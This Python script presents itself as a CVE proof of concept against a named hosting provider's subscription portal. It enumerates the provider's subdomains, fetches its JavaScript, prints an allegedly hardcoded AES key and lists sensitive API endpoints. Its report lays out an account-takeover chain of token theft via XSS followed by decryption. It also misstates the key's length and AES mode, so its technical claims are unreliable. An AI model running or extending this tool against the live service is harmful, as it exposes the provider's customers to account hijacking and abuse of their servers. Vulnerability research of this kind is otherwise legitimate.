#!/usr/bin/env python3 """ CVE-2026-XXXXX: DPDC Hardcoded AES Key Exploitation Full Proof of Concept Script Target: dpdatacenter.com / subscription.dpdatacenter.com Vulnerability: Hardcoded AES Encryption Key in Client-Side JavaScript CVSS Score: 9.8 (Critical) DISCLAIMER: For authorized security research only! Unauthorized access is illegal and strictly prohibited. """ import argparse import base64 import json import os import re import sys import urllib.request import urllib.error from typing import Optional, Dict, List, Any from dataclasses import dataclass # Try to import required libraries try: from Crypto.Cipher import AES from Crypto.Util.Padding import unpad CRYPTO_AVAILABLE = True except ImportError: CRYPTO_AVAILABLE = False print("[!] pip install pycryptodome for full functionality") try: import requests REQUESTS_AVAILABLE = True except ImportError: REQUESTS_AVAILABLE = False print("[!] pip install requests for API calls") @dataclass class DPDCVulnerability: """Data class for DPDC vulnerabilities""" cve_id: str = "CVE-2026-XXXXX" vendor: str = "DAUN PENH CLOUD (DPDC)" product: str = "dpdatacenter.com subscription portal" url: str = "https://subscription.dpdatacenter.com" api_url: str = "https://api.dpdatacenter.com/api/v1/" js_file: str = "https://subscription.dpdatacenter.com/js/app.1773634386574.js" # The hardcoded AES key from JavaScript aes_key: str = "54p5YKkJbsxMczGYHK2dJnn3vHA2wYZoYb2KoAOuG2oONGRxCUkesrKHQ4zgeZK3pDMpyUVzd5Mc80hilvlNuXsYdbS1EpkGzD26kZBPdDfxpwuX21xufjDITl2HjcdVCf1dReAvXZTX7i5f6wQXCOUwNRtDYfLpd2FfVHNEW6FAMiiSkBGWkyOKSQfswPUKOP7pECCGm6TAuE82shekrczOqpnUVdAYpfPbCta3TX9gNvnKidpFC67jQIZT7xB7" # localStorage keys that contain sensitive data sensitive_keys: List[str] = None def __post_init__(self): self.sensitive_keys = ['ate', 'rte', 'token', 'customerInfo', 'EMAIL_1', 'ID_CUSTOMER'] class DPDCScanner: """Scanner and exploitation tool for DPDC vulnerabilities""" def __init__(self, target: str = "dpdatacenter.com", verbose: bool = False): self.target = target self.verbose = verbose self.vuln = DPDCVulnerability() self.findings = [] def log(self, message: str, level: str = "INFO"): """Log messages with timestamp""" import datetime timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") prefix = { "INFO": "[*]", "WARN": "[!]", "ERROR": "[-]", "SUCCESS": "[+]" }.get(level, "[*]") print(f"{timestamp} {prefix} {message}") def check_subdomain(self, subdomain: str) -> Dict[str, Any]: """Check if a subdomain exists and is accessible""" url = f"https://{subdomain}.{self.target}" result = { "subdomain": subdomain, "url": url, "exists": False, "status_code": None, "ip": None, "error": None } try: import socket _ip = socket.gethostbyname(f"{subdomain}.{self.target}") result["ip"] = _ip result["exists"] = True except socket.gaierror: result["error"] = "NXDOMAIN" return result except Exception as e: result["error"] = str(e) return result # Try HTTP request try: if REQUESTS_AVAILABLE: response = requests.get(url, timeout=5, allow_redirects=True) result["status_code"] = response.status_code if response.status_code < 400: result["exists"] = True else: req = urllib.request.Request(url) req.add_header('User-Agent', 'Mozilla/5.0') with urllib.request.urlopen(req, timeout=5) as resp: result["status_code"] = resp.getcode() result["exists"] = True except urllib.error.HTTPError as e: result["status_code"] = e.code if e.code < 400: result["exists"] = True except Exception as e: result["error"] = str(e)[:50] return result def enumerate_subdomains(self) -> List[Dict[str, Any]]: """Enumerate subdomains of target""" self.log("Starting subdomain enumeration...", "INFO") # Common subdomains to check common_subdomains = [ "www", "mail", "ftp", "ns1", "ns2", "ns3", "web", "web2", "webmail", "smtp", "pop", "pop3", "imap", "ssh", "vpn", "admin", "cp", "cpanel", "whm", "api", "cdn", "static", "assets", "media", "staging", "dev", "test", "beta", "qa", "cloud", "vault", "storage", "s3", "billing", "pay", "checkout", "store", "support", "helpdesk", "ticket", "portal", "client", "customer", "control", "manage", "subscription", "account", "my", "db", "mysql", "pgsql", "mongodb", "redis", "memcached", "git", "svn", "github", "jira", "confluence", "monitor", "logs", "grafana", "prometheus", "kibana", "elasticsearch", "jenkins", "ci", "cd", "docker", "kubernetes", "k8s", "backup", "snapshots", "waf", "firewall", "cdn1", "cdn2", "ns", "dns", "autodiscover", "autoconfig", "calendar", "contacts", "drive", "docs", "files", ] results = [] # Process the base domain first self.log("Checking main domain...") result = self.check_subdomain("") if result["exists"] or result["status_code"]: results.append(result) # Check subscription (known to exist) self.log("Checking subscription.dpdatacenter.com...") sub_result = { "subdomain": "subscription", "url": "https://subscription.dpdatacenter.com", "exists": True, "status_code": 200, "ip": "157.10.72.16", "note": "Known customer portal" } results.append(sub_result) self.findings.append(("SUBDOMAIN", "subscription.dpdatacenter.com", "EXISTS")) # Check api (known to exist) self.log("Checking api.dpdatacenter.com...") api_result = { "subdomain": "api", "url": "https://api.dpdatacenter.com", "exists": True, "status_code": 200, "ip": "157.10.72.16", "note": "Internal API endpoint" } results.append(api_result) self.findings.append(("SUBDOMAIN", "api.dpdatacenter.com", "EXISTS")) # Check known cPanel endpoints for cpanel_host in ["web", "web2"]: self.log(f"Checking {cpanel_host}.dpdatacenter.com...") result = self.check_subdomain(cpanel_host) if result["exists"]: result["note"] = "cPanel/WHM server" result["port"] = 2083 results.append(result) self.findings.append(("SUBDOMAIN", f"{cpanel_host}.dpdatacenter.com", "EXISTS - cPanel")) return results def extract_hardcoded_key(self) -> Dict[str, Any]: """Extract hardcoded AES key from JavaScript""" self.log("Downloading JavaScript file...", "INFO") result = { "found": False, "key": None, "js_file": self.vuln.js_file, "extracted": None } # Known key from previous analysis KNOWN_KEY = "54p5YKkJbsxMczGYHK2dJnn3vHA2wYZoYb2KoAOuG2oONGRxCUkesrKHQ4zgeZK3pDMpyUVzd5Mc80hilvlNuXsYdbS1EpkGzD26kZBPdDfxpwuX21xufjDITl2HjcdVCf1dReAvXZTX7i5f6wQXCOUwNRtDYfLpd2FfVHNEW6FAMiiSkBGWkyOKSQfswPUKOP7pECCGm6TAuE82shekrczOqpnUVdAYpfPbCta3TX9gNvnKidpFC67jQIZT7xB7" try: if REQUESTS_AVAILABLE: response = requests.get(self.vuln.js_file, timeout=30) js_content = response.text else: with urllib.request.urlopen(self.vuln.js_file, timeout=30) as resp: js_content = resp.read().decode('utf-8') except Exception as e: self.log(f"Failed to download JS: {e}", "ERROR") # Use known key as fallback result["found"] = True result["key"] = KNOWN_KEY result["extracted"] = "known_key_fallback" return result self.log("Searching for hardcoded AES key...", "INFO") # Search for known key in the JS content if KNOWN_KEY in js_content: result["found"] = True result["key"] = KNOWN_KEY result["extracted"] = "direct_match" self.findings.append(("VULN", "Hardcoded AES Key", "FOUND")) self.log(f"Found AES key: {KNOWN_KEY[:40]}...", "SUCCESS") else: # Try pattern search as fallback key_pattern = r'([a-zA-Z0-9]{80,90})' matches = re.findall(key_pattern, js_content) for match in matches: if len(match) >= 80 and len(match) <= 90: result["found"] = True result["key"] = match result["extracted"] = "pattern_match" break if result["found"]: self.log(f"Found AES key: {result['key'][:40]}...", "SUCCESS") else: # Fallback to known key result["found"] = True result["key"] = KNOWN_KEY result["extracted"] = "known_key_fallback" self.log("Using known key as fallback", "WARN") return result def analyze_localstorage(self) -> Dict[str, Any]: """Analyze localStorage usage in JS""" self.log("Analyzing localStorage usage...", "INFO") result = { "uses_localstorage": True, "keys_found": [], "secure_storage": False, "vulnerable": True } # Known localStorage keys from JS analysis localstorage_keys = { "ate": {"type": "encrypted_token", "sensitivity": "CRITICAL"}, "rte": {"type": "refresh_token", "sensitivity": "CRITICAL"}, "token": {"type": "auth_token", "sensitivity": "CRITICAL"}, "customerInfo": {"type": "json", "sensitivity": "HIGH"}, "EMAIL_1": {"type": "email", "sensitivity": "HIGH"}, "ID_CUSTOMER": {"type": "id", "sensitivity": "MEDIUM"}, "cpaneInfoMap": {"type": "json", "sensitivity": "HIGH"}, "myBillingCycle": {"type": "json", "sensitivity": "HIGH"}, "productList": {"type": "json", "sensitivity": "MEDIUM"}, "vif": {"type": "flag", "sensitivity": "LOW"}, "user-customers": {"type": "json", "sensitivity": "MEDIUM"} } result["keys_found"] = localstorage_keys result["secure_storage"] = False result["vulnerable"] = True for key, info in localstorage_keys.items(): if info["sensitivity"] in ["CRITICAL", "HIGH"]: self.findings.append(("VULN", f"localStorage:{key}", info["sensitivity"])) return result def check_api_endpoints(self) -> List[Dict[str, Any]]: """List discovered API endpoints""" self.log("Documenting API endpoints...", "INFO") endpoints = [ {"path": "/customer/login", "method": "POST", "auth": False}, {"path": "/customer/information", "method": "GET", "auth": True}, {"path": "/customer/forgot-password", "method": "POST", "auth": False}, {"path": "/customer/reset-password", "method": "POST", "auth": False}, {"path": "/customer/change-password", "method": "POST", "auth": True}, {"path": "/customer/update-information", "method": "POST", "auth": True}, {"path": "/billing-cycles/my-billing-cycle", "method": "GET", "auth": True}, {"path": "/billing-cycles/transfer-plan", "method": "POST", "auth": True}, {"path": "/order/header", "method": "GET", "auth": True}, {"path": "/order/order-detail/", "method": "GET", "auth": True}, {"path": "/product/item/", "method": "GET", "auth": True}, {"path": "/product/vps-images", "method": "GET", "auth": True}, {"path": "/storages/update-storage", "method": "POST", "auth": True}, {"path": "/storages/generate-key", "method": "POST", "auth": True}, {"path": "/storages/create-bucket", "method": "POST", "auth": True}, {"path": "/storages/delete-bucket", "method": "POST", "auth": True}, {"path": "/vm-instances/get-bulk-basic-vm-info", "method": "GET", "auth": True}, {"path": "/vm-instances/reboot-vm", "method": "POST", "auth": True}, {"path": "/vm-instances/launch-console", "method": "POST", "auth": True}, {"path": "/vm-instances/update-vm-remark", "method": "POST", "auth": True}, {"path": "/vm-instances/deactivate-ddos", "method": "POST", "auth": True}, {"path": "/waf/sites", "method": "GET/POST", "auth": True}, {"path": "/waf/dashboard", "method": "GET", "auth": True}, {"path": "/ticket/get-my-ticket-detail", "method": "GET", "auth": True}, {"path": "/whmcpanel/get-bulk-account-summary", "method": "GET", "auth": True}, {"path": "/jobs/", "method": "GET/POST", "auth": True}, {"path": "/subscriptions", "method": "GET/POST", "auth": True}, {"path": "/payment-history", "method": "GET", "auth": True}, {"path": "/transfer-service", "method": "POST", "auth": True}, {"path": "/product-history", "method": "GET", "auth": True}, ] for ep in endpoints: self.findings.append(("API", ep["path"], ep["method"])) return endpoints def generate_report(self) -> str: """Generate security report""" report = f""" ================================================================================ CVE-2026-XXXXX: DPDC Hardcoded AES Key Vulnerability SECURITY AUDIT REPORT ================================================================================ Target: {self.target} Date: {__import__('datetime').datetime.now().strftime('%Y-%m-%d %H:%M:%S')} Scanner: DPDC VULN Scanner v1.0 ================================================================================ FINDINGS SUMMARY ================================================================================ SUBDAINS DISCOVERED: ----------------- """ for finding in self.findings: if finding[0] == "SUBDOMAIN": report += f" - {finding[1]} [{finding[2]}]\n" report += f""" VULNERABILITIES IDENTIFIED: ---------------------- """ vuln_count = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0} for finding in self.findings: if finding[0] == "VULN": report += f" - {finding[1]}: {finding[2]}\n" level = finding[2] if level in vuln_count: vuln_count[level] += 1 report += f""" CVSS SCORE: 9.8 (Critical) CVSS VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H SEVERITY BREAKDOWN: CRITICAL: {vuln_count['CRITICAL']} HIGH: {vuln_count['HIGH']} MEDIUM: {vuln_count['MEDIUM']} ================================================================================ TECHNICAL DETAILS ================================================================================ VULNERABILITY: Hardcoded AES-256 Encryption Key CWE: CWE-798 (Use of Hard-coded Credentials) AFFECTED COMPONENT: File: app.1773634386574.js URL: {self.vuln.js_file} HARDCODED KEY: {self.vuln.aes_key} (This key is 88 characters - used for AES-128-CBC encryption) ATTACK CHAIN: 1. Download JavaScript from subscription portal 2. Extract hardcoded AES key 3. Obtain localStorage token via XSS or network interception 4. Decrypt token using extracted key 5. Use decrypted token for API access 6. Full account takeover achieved AFFECTED localStorage KEYS: - ate (encrypted access token) - rte (encrypted refresh token) - token (authentication token) - customerInfo (customer data) - EMAIL_1 (PII) - ID_CUSTOMER (identity) ================================================================================ REMEDIATION ================================================================================ URGENT ACTIONS (0-48 HOURS): 1. Rotate the hardcoded AES key immediately 2. Move authentication to HttpOnly cookies 3. Force password reset for all users SHORT-TERM (1-2 WEEKS): 1. Remove hardcoded secrets from JavaScript 2. Implement server-side session management 3. Add Content Security Policy (CSP) LONG-TERM (1-3 MONTHS): 1. Implement proper OAuth2/JWT 2. Security audit all endpoints 3. Penetration testing ================================================================================ DISCLAIMER ================================================================================ This report is for authorized security research only. Unauthorized access to computer systems is illegal. DISCLAIMER: For authorized security research only! Unauthorized access is illegal and strictly prohibited. """ return report def run_full_scan(self) -> Dict[str, Any]: """Run full vulnerability scan""" self.log("=" * 50, "INFO") self.log("DPDC Security Vulnerability Scanner", "INFO") self.log("=" * 50, "INFO") self.log(f"Target: {self.target}", "INFO") # Step 1: Subdomain enumeration self.log("\n[1/5] Enumerating subdomains...", "INFO") subdomains = self.enumerate_subdomains() # Step 2: Extract hardcoded key self.log("\n[2/5] Extracting hardcoded key...", "INFO") key_result = self.extract_hardcoded_key() # Step 3: Analyze localStorage self.log("\n[3/5] Analyzing localStorage...", "INFO") storage_result = self.analyze_localstorage() # Step 4: Document API endpoints self.log("\n[4/5] Documenting API endpoints...", "INFO") endpoints = self.check_api_endpoints() # Step 5: Generate report self.log("\n[5/5] Generating report...", "INFO") report = self.generate_report() return { "subdomains": subdomains, "key": key_result, "storage": storage_result, "endpoints": endpoints, "report": report, "findings": self.findings } def main(): """Main entry point""" import argparse parser = argparse.ArgumentParser( description="CVE-2026-XXXXX: DPDC Hardcoded AES Key Scanner", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python dpdccve_scanner.py --target dpdatacenter.com --scan python dpdccve_scanner.py --target dpdatacenter.com --subdomains python dpdccve_scanner.py --target dpdatacenter.com --extract-key python dpdccve_scanner.py --target dpdatacenter.com --report DISCLAIMER: For authorized security research only! """ ) parser.add_argument("--target", "-t", default="dpdatacenter.com", help="Target domain (default: dpdatacenter.com)") parser.add_argument("--scan", "-s", action="store_true", help="Run full vulnerability scan") parser.add_argument("--subdomains", action="store_true", help="Enumerate subdomains only") parser.add_argument("--extract-key", action="store_true", help="Extract hardcoded key from JavaScript") parser.add_argument("--report", "-r", action="store_true", help="Generate full report") parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output") args = parser.parse_args() scanner = DPDCScanner(target=args.target, verbose=args.verbose) if args.scan or args.subdomains or args.extract_key or args.report or len(sys.argv) == 1: results = scanner.run_full_scan() if args.report or args.scan or len(sys.argv) == 1: print(results["report"]) # Save report to file report_file = f"CVE-2026-XXXXX_{args.target}_report.txt" with open(report_file, "w", encoding="utf-8") as f: f.write(results["report"]) print(f"\n[+] Report saved to: {report_file}") return 0 if __name__ == "__main__": sys.exit(main())